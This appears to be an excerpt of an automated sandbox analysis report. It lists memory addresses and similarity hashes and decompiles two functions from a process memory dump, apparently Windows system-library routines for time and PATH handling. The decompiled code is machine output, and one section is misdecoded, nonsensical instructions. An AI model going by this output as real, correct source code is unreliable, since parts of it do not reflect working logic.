                                                      0x016b4805
                                                      0x016b480c
                                                      0x016b480e
                                                      0x0165b1d1
                                                      0x0165b1d3
                                                      0x0165b1de
                                                      0x0165b1de
                                                      0x016b4817
                                                      0x016b481e
                                                      0x016b4820
                                                      0x016b4822
                                                      0x016b4822
                                                      0x016b4824
                                                      0x016b4824
                                                      0x016b482a
                                                      0x00000000
                                                      0x00000000
                                                      0x016b4835
                                                      0x016b483a
                                                      0x016b483d
                                                      0x016b483f
                                                      0x016b4842
                                                      0x016b4842
                                                      0x016b4842
                                                      0x016b4846
                                                      0x016b484c
                                                      0x016b484e
                                                      0x016b4851
                                                      0x016b4851
                                                      0x016b4853
                                                      0x016b4854
                                                      0x016b4854
                                                      0x016b4858
                                                      0x016b485a
                                                      0x016b485a
                                                      0x016b485d
                                                      0x016b485f
                                                      0x016b4861
                                                      0x016b4861
                                                      0x016b4866
                                                      0x016b486b
                                                      0x016b486e
                                                      0x016b4871
                                                      0x016b4876
                                                      0x016b4876
                                                      0x016b4878
                                                      0x016b487b
                                                      0x016b4884
                                                      0x016b4884
                                                      0x00000000
                                                      0x016b487d
                                                      0x016b487d
                                                      0x016b4882
                                                      0x016b4889
                                                      0x016b4889
                                                      0x016b488f
                                                      0x016b4891
                                                      0x016b48e0
                                                      0x016b48e2
                                                      0x016b48e4
                                                      0x016b48e4
                                                      0x016b48e7
                                                      0x016b48e7
                                                      0x016b48ed
                                                      0x016b48f4
                                                      0x016b48f6
                                                      0x016b4951
                                                      0x016b4951
                                                      0x016b4953
                                                      0x016b4953
                                                      0x016b4956
                                                      0x016b4956
                                                      0x016b4958
                                                      0x016b4959
                                                      0x016b4959
                                                      0x016b495d
                                                      0x016b495d
                                                      0x016b495f
                                                      0x016b495f
                                                      0x016b4965
                                                      0x016b4969
                                                      0x016b49ba
                                                      0x016b49ba
                                                      0x016b49c1
                                                      0x016b49c5
                                                      0x016b49cc
                                                      0x016b49d4
                                                      0x016b49d7
                                                      0x016b49da
                                                      0x016b49e4
                                                      0x016b49e5
                                                      0x016b49f3
                                                      0x016b4a02
                                                      0x00000000
                                                      0x016b4a02
                                                      0x016b4972
                                                      0x016b4974
                                                      0x00000000
                                                      0x00000000
                                                      0x016b4976
                                                      0x016b4979
                                                      0x016b4982
                                                      0x016b4983
                                                      0x016b4984
                                                      0x016b498b
                                                      0x016b498d
                                                      0x016b4991
                                                      0x016b4993
                                                      0x016b4999
                                                      0x016b499d
                                                      0x016b49a2
                                                      0x016b49a2
                                                      0x016b49a2
                                                      0x016b4999
                                                      0x016b49ac
                                                      0x00000000
                                                      0x016b49b3
                                                      0x016b48f8
                                                      0x016b48fe
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x016b48fe
                                                      0x016b4895
                                                      0x016b489c
                                                      0x016b48ad
                                                      0x016b48b2
                                                      0x016b48b5
                                                      0x016b48b7
                                                      0x016b48ba
                                                      0x016b48bc
                                                      0x016b48c6
                                                      0x016b48c6
                                                      0x016b48cb
                                                      0x016b48d1
                                                      0x016b48d4
                                                      0x016b48d8
                                                      0x016b48d8
                                                      0x00000000
                                                      0x016b48d8
                                                      0x016b48be
                                                      0x016b48c0
                                                      0x00000000
                                                      0x00000000
                                                      0x016b48c2
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x016b48c4
                                                      0x00000000
                                                      0x016b4882
                                                      0x016b487b
                                                      0x016b4904
                                                      0x016b4906
                                                      0x00000000
                                                      0x00000000
                                                      0x016b4908
                                                      0x016b490e
                                                      0x00000000
                                                      0x00000000
                                                      0x016b4910
                                                      0x016b4917
                                                      0x016b4917
                                                      0x00000000
                                                      0x016b4917
                                                      0x0165b1ba
                                                      0x016b47f9
                                                      0x016b47fc
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x016b47fc
                                                      0x0165b1c0
                                                      0x0165b1c0
                                                      0x0165b1c3
                                                      0x0165b1cb
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID: _vswprintf_s
                                                      • String ID:
                                                      • API String ID: 677850445-0
                                                      • Opcode ID: 5cd08ddfcfcca9ac5a0166fc3d87224df86ecb49d3b9f1c7d2254e475d190943
                                                      • Instruction ID: aee6084f39952fdfdf633ac0dd04b527a5ebcf1eb29904b0af433832c98a21d1
                                                      • Opcode Fuzzy Hash: 5cd08ddfcfcca9ac5a0166fc3d87224df86ecb49d3b9f1c7d2254e475d190943
                                                      • Instruction Fuzzy Hash: F551AF71D102698BDF359F688C84BFEBBB1AF04710F1141ADD95AAB382DB718981CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0167B944, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 76%
                                                      			E0167B944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x174d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E01677D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E01728CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E01699E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E0169B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E0169CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E01677D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E01728F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E0169AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x1748628; // 0x0
								_v68 = _t77;
								_t78 =  *0x174862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x1748628; // 0x0
							_t116 =  *0x174862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}
















































                                                      0x0167b94c
                                                      0x0167b956
                                                      0x0167b95c
                                                      0x0167b95e
                                                      0x0167b964
                                                      0x0167b969
                                                      0x0167b96d
                                                      0x0167b96d
                                                      0x0167b970
                                                      0x0167b974
                                                      0x0167b97a
                                                      0x0167badf
                                                      0x0167badf
                                                      0x0167bae2
                                                      0x0167bae4
                                                      0x0167bae6
                                                      0x0167baf0
                                                      0x016c2cb8
                                                      0x0167baf6
                                                      0x0167baf6
                                                      0x0167baf6
                                                      0x0167bafd
                                                      0x0167bb1f
                                                      0x0167bb1f
                                                      0x0167baff
                                                      0x0167bb00
                                                      0x0167bb00
                                                      0x0167bb03
                                                      0x0167bb03
                                                      0x0167bacb
                                                      0x0167bacf
                                                      0x0167bad0
                                                      0x0167bad1
                                                      0x0167badc
                                                      0x0167badc
                                                      0x0167b980
                                                      0x0167b980
                                                      0x0167b988
                                                      0x0167b98b
                                                      0x0167b98d
                                                      0x0167b990
                                                      0x0167b993
                                                      0x0167b999
                                                      0x0167b99b
                                                      0x0167b9a1
                                                      0x0167b9a5
                                                      0x0167b9aa
                                                      0x0167b9b0
                                                      0x0167b9bb
                                                      0x0167b9c0
                                                      0x0167b9c3
                                                      0x0167b9ca
                                                      0x0167b9cc
                                                      0x0167b9cf
                                                      0x0167b9d3
                                                      0x0167b9d7
                                                      0x0167ba94
                                                      0x0167ba94
                                                      0x0167ba98
                                                      0x0167baa3
                                                      0x016c2ccb
                                                      0x0167baa9
                                                      0x0167baa9
                                                      0x0167baa9
                                                      0x0167bab1
                                                      0x016c2cd5
                                                      0x016c2cdd
                                                      0x016c2cdd
                                                      0x0167babb
                                                      0x0167babc
                                                      0x0167bac2
                                                      0x0167bac3
                                                      0x0167bac3
                                                      0x0167bac6
                                                      0x00000000
                                                      0x0167b9dd
                                                      0x0167b9dd
                                                      0x0167b9e7
                                                      0x0167b9e7
                                                      0x0167b9ec
                                                      0x0167b9ec
                                                      0x0167b9f1
                                                      0x0167b9f5
                                                      0x0167b9fa
                                                      0x0167ba00
                                                      0x0167ba0c
                                                      0x0167ba10
                                                      0x0167ba10
                                                      0x0167ba12
                                                      0x0167ba18
                                                      0x00000000
                                                      0x00000000
                                                      0x0167bb26
                                                      0x0167bb26
                                                      0x0167ba1e
                                                      0x0167ba1e
                                                      0x0167ba23
                                                      0x0167ba25
                                                      0x0167ba2c
                                                      0x0167ba30
                                                      0x0167ba35
                                                      0x0167ba35
                                                      0x0167ba41
                                                      0x0167ba46
                                                      0x0167ba4c
                                                      0x0167ba50
                                                      0x0167ba54
                                                      0x0167ba6a
                                                      0x0167ba6e
                                                      0x0167ba70
                                                      0x0167ba74
                                                      0x0167ba78
                                                      0x0167ba7a
                                                      0x0167ba7c
                                                      0x0167ba8e
                                                      0x0167ba90
                                                      0x0167ba92
                                                      0x0167bb14
                                                      0x0167bb14
                                                      0x0167bb16
                                                      0x0167bb16
                                                      0x00000000
                                                      0x0167ba7c
                                                      0x0167bb0a
                                                      0x0167bb0d
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0167bb0f

                                                      APIs
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0167B9A5
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                      • String ID:
                                                      • API String ID: 885266447-0
                                                      • Opcode ID: 865da177a3a1f5c1720d68ee0e80bcd74405ee2d2172aa4281d01360fc571d18
                                                      • Instruction ID: a92c6163cd064fc2b52f461bec9812b1a39d7430e7fd0250357063b8d2e2021e
                                                      • Opcode Fuzzy Hash: 865da177a3a1f5c1720d68ee0e80bcd74405ee2d2172aa4281d01360fc571d18
                                                      • Instruction Fuzzy Hash: 31514871A08345CFC721EF6DC88092BBBE5FB88610F14896EF99587355DB31E844CB92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01682581, Relevance: 1.6, Strings: 1, Instructions: 329COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 83%
                                                      			E01682581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, char _a1530200420, char _a1546912100) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t239;
				signed int _t243;
				char* _t244;
				signed int _t248;
				signed int _t250;
				intOrPtr _t252;
				signed int _t255;
				signed int _t262;
				signed int _t265;
				signed int _t273;
				signed int _t279;
				signed int _t281;
				void* _t283;
				void* _t284;
				signed int _t285;
				unsigned int _t288;
				signed int _t292;
				void* _t293;
				signed int _t294;
				signed int _t298;
				intOrPtr _t310;
				signed int _t319;
				signed int _t321;
				signed int _t322;
				signed int _t326;
				signed int _t327;
				void* _t329;
				signed int _t330;
				signed int _t332;
				signed int _t334;
				void* _t335;
				void* _t337;

				_t332 = _t334;
				_t335 = _t334 - 0x4c;
				_v8 =  *0x174d360 ^ _t332;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t326 = 0x174b2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t288 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t279 = 0x48;
				_t308 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
				_t319 = 0;
				_v37 = _t308;
				if(_v48 <= 0) {
					L16:
					_t45 = _t279 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t327 = 0xc0000106;
						goto L32;
					} else {
						_t326 = L01674620(_t288,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t279);
						_v52 = _t326;
						__eflags = _t326;
						if(_t326 == 0) {
							_t327 = 0xc0000017;
							goto L32;
						} else {
							 *(_t326 + 0x44) =  *(_t326 + 0x44) & 0x00000000;
							_t50 = _t326 + 0x48; // 0x48
							_t321 = _t50;
							_t308 = _v32;
							 *(_t326 + 0x3c) = _t279;
							_t281 = 0;
							 *((short*)(_t326 + 0x30)) = _v48;
							__eflags = _t308;
							if(_t308 != 0) {
								 *(_t326 + 0x18) = _t321;
								__eflags = _t308 - 0x1748478;
								 *_t326 = ((0 | _t308 == 0x01748478) - 0x00000001 & 0xfffffffb) + 7;
								E0169F3E0(_t321,  *((intOrPtr*)(_t308 + 4)),  *_t308 & 0x0000ffff);
								_t308 = _v32;
								_t335 = _t335 + 0xc;
								_t281 = 1;
								__eflags = _a8;
								_t321 = _t321 + (( *_t308 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t273 = E016E39F2(_t321);
									_t308 = _v32;
									_t321 = _t273;
								}
							}
							_t292 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t327 = _v68;
								__eflags = 0;
								 *((short*)(_t321 - 2)) = 0;
								goto L32;
							} else {
								_t279 = _t326 + _t281 * 4;
								_v56 = _t279;
								do {
									__eflags = _t308;
									if(_t308 != 0) {
										_t239 =  *(_v60 + _t292 * 4);
										__eflags = _t239;
										if(_t239 == 0) {
											goto L30;
										} else {
											__eflags = _t239 == 5;
											if(_t239 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t279 =  *(_v60 + _t292 * 4);
										 *(_t279 + 0x18) = _t321;
										_t243 =  *(_v60 + _t292 * 4);
										__eflags = _t243 - 8;
										if(_t243 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t243 * 4 +  &M01682959))) {
												case 0:
													__ax =  *0x1748488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E0169F3E0(__edi,  *0x174848c, __ax & 0x0000ffff);
														__eax =  *0x1748488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E0169F3E0(_t321, _v80, _v64);
													_t268 = _v64;
													goto L26;
												case 2:
													 *0x1748480 & 0x0000ffff = E0169F3E0(__edi,  *0x1748484,  *0x1748480 & 0x0000ffff);
													__eax =  *0x1748480 & 0x0000ffff;
													__eax = ( *0x1748480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E0169F3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E0169F3E0(_t321, _v76, _v36);
														_t268 = _v36;
													}
													L26:
													_t335 = _t335 + 0xc;
													_t321 = _t321 + (_t268 >> 1) * 2 + 2;
													__eflags = _t321;
													L27:
													_push(0x3b);
													_pop(_t270);
													 *((short*)(_t321 - 2)) = _t270;
													goto L28;
												case 6:
													__ebx =  *0x174575c;
													__eflags = __ebx - 0x174575c;
													if(__ebx != 0x174575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E0169F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x174575c;
														} while (__ebx != 0x174575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x1748478 & 0x0000ffff = E0169F3E0(__edi,  *0x174847c,  *0x1748478 & 0x0000ffff);
													__eax =  *0x1748478 & 0x0000ffff;
													__eax = ( *0x1748478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E016E39F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x1746e58 & 0x0000ffff = E0169F3E0(__edi,  *0x1746e5c,  *0x1746e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x1746e58 & 0x0000ffff;
													__eax = ( *0x1746e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t292 = _v16;
													_t308 = _v32;
													L29:
													_t279 = _t279 + 4;
													__eflags = _t279;
													_v56 = _t279;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t292 = _t292 + 1;
									_v16 = _t292;
									__eflags = _t292 - _v48;
								} while (_t292 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t243 =  *(_v60 + _t319 * 4);
						if(_t243 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t243 * 4 +  &M01682935))) {
							case 0:
								__ax =  *0x1748488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t308 =  &_v64;
								_v80 = E01682E3E(0,  &_v64);
								_t279 = _t279 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x1748480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x1748480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E0166EEF0(0x17479a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E0166EB70(__ecx, 0x17479a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t217 = _v72;
											__eflags = _t217;
											if(_t217 != 0) {
												L016777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t217);
											}
											_t218 = _v52;
											__eflags = _t218;
											if(_t218 != 0) {
												__eflags = _t327;
												if(_t327 < 0) {
													L016777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t218);
													_t218 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t288 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x1747b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L01674620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E0166EB70(__ecx, 0x17479a0);
										__eax = _v52;
										L36:
										_pop(_t320);
										_pop(_t328);
										__eflags = _v8 ^ _t332;
										_pop(_t280);
										return E0169B640(_t218, _t280, _v8 ^ _t332, _t308, _t320, _t328);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t275 = _v56;
								if(_v56 != 0) {
									_t308 =  &_v36;
									_t277 = E01682E3E(_t275,  &_v36);
									_t288 = _v36;
									_v76 = _t277;
								}
								if(_t288 == 0) {
									goto L44;
								} else {
									_t279 = _t279 + 2 + _t288;
								}
								goto L14;
							case 6:
								__eax =  *0x1745764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x1748478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x1748478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x1746e58 & 0x0000ffff;
								__eax = ( *0x1746e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t319 = _t319 + 1;
								if(_t319 >= _v48) {
									goto L16;
								} else {
									_t308 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					_t293 = 0x25;
					asm("int 0x29");
					asm("out 0x28, al");
					_push(0x68286601);
					_t244 = _t243 + _t335;
					asm("daa");
					_push(0x68262e01);
					 *((intOrPtr*)(_t326 + 0x28)) =  *((intOrPtr*)(_t326 + 0x28)) + _t244;
					 *_t321 =  *_t321 + _t279;
					_t283 = 0x68260501;
					asm("insb");
					 *((intOrPtr*)(_t244 +  &_a1530200420)) =  *((intOrPtr*)(_t244 +  &_a1530200420)) + _t308;
					asm("insb");
					 *_t308 =  *_t308 + _t244;
					 *((intOrPtr*)(_t244 + 1)) =  *((intOrPtr*)(_t244 + 1)) - _t332;
					 *_t244 =  *_t244 - 0x68;
					_t329 = _t326 + _t326;
					asm("daa");
					_push(0x68281e01);
					 *((intOrPtr*)(_t329 + 0x28)) =  *((intOrPtr*)(_t329 + 0x28)) + _t293;
					_t284 = 0x68275d01;
					asm("insb");
					 *((intOrPtr*)(_t244 + _t283 +  &_a1546912100)) =  *((intOrPtr*)(_t244 + _t283 +  &_a1546912100)) + _t329;
					asm("insb");
					_t337 = _t335 + _t293;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x172ff00);
					E016AD08C(_t284, _t321, _t329);
					_v44 =  *[fs:0x18];
					_t322 = 0;
					 *_a24 = 0;
					_t285 = _a12;
					__eflags = _t285;
					if(_t285 == 0) {
						_t248 = 0xc0000100;
					} else {
						_v8 = 0;
						_t330 = 0xc0000100;
						_v52 = 0xc0000100;
						_t250 = 4;
						while(1) {
							_v40 = _t250;
							__eflags = _t250;
							if(_t250 == 0) {
								break;
							}
							_t298 = _t250 * 0xc;
							_v48 = _t298;
							__eflags = _t285 -  *((intOrPtr*)(_t298 + 0x1631664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t265 = E0169E5C0(_a8,  *((intOrPtr*)(_t298 + 0x1631668)), _t285);
									_t337 = _t337 + 0xc;
									__eflags = _t265;
									if(__eflags == 0) {
										_t330 = E016D51BE(_t285,  *((intOrPtr*)(_v48 + 0x163166c)), _a16, _t322, _t330, __eflags, _a20, _a24);
										_v52 = _t330;
										break;
									} else {
										_t250 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t250 = _t250 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t330;
						__eflags = _t330;
						if(_t330 < 0) {
							__eflags = _t330 - 0xc0000100;
							if(_t330 == 0xc0000100) {
								_t294 = _a4;
								__eflags = _t294;
								if(_t294 != 0) {
									_v36 = _t294;
									__eflags =  *_t294 - _t322;
									if( *_t294 == _t322) {
										_t330 = 0xc0000100;
										goto L76;
									} else {
										_t310 =  *((intOrPtr*)(_v44 + 0x30));
										_t252 =  *((intOrPtr*)(_t310 + 0x10));
										__eflags =  *((intOrPtr*)(_t252 + 0x48)) - _t294;
										if( *((intOrPtr*)(_t252 + 0x48)) == _t294) {
											__eflags =  *(_t310 + 0x1c);
											if( *(_t310 + 0x1c) == 0) {
												L106:
												_t330 = E01682AE4( &_v36, _a8, _t285, _a16, _a20, _a24);
												_v32 = _t330;
												__eflags = _t330 - 0xc0000100;
												if(_t330 != 0xc0000100) {
													goto L69;
												} else {
													_t322 = 1;
													_t294 = _v36;
													goto L75;
												}
											} else {
												_t255 = E01666600( *(_t310 + 0x1c));
												__eflags = _t255;
												if(_t255 != 0) {
													goto L106;
												} else {
													_t294 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t330 = E01682C50(_t294, _a8, _t285, _a16, _a20, _a24, _t322);
											L76:
											_v32 = _t330;
											goto L69;
										}
									}
									goto L108;
								} else {
									E0166EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t330 = _a24;
									_t262 = E01682AE4( &_v36, _a8, _t285, _a16, _a20, _t330);
									_v32 = _t262;
									__eflags = _t262 - 0xc0000100;
									if(_t262 == 0xc0000100) {
										_v32 = E01682C50(_v36, _a8, _t285, _a16, _a20, _t330, 1);
									}
									_v8 = _t322;
									E01682ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t248 = _t330;
					}
					L70:
					return E016AD0D1(_t248);
				}
				L108:
			}





















































                                                      0x01682584
                                                      0x01682586
                                                      0x01682590
                                                      0x01682596
                                                      0x01682597
                                                      0x01682598
                                                      0x01682599
                                                      0x0168259e
                                                      0x016825a4
                                                      0x016825a9
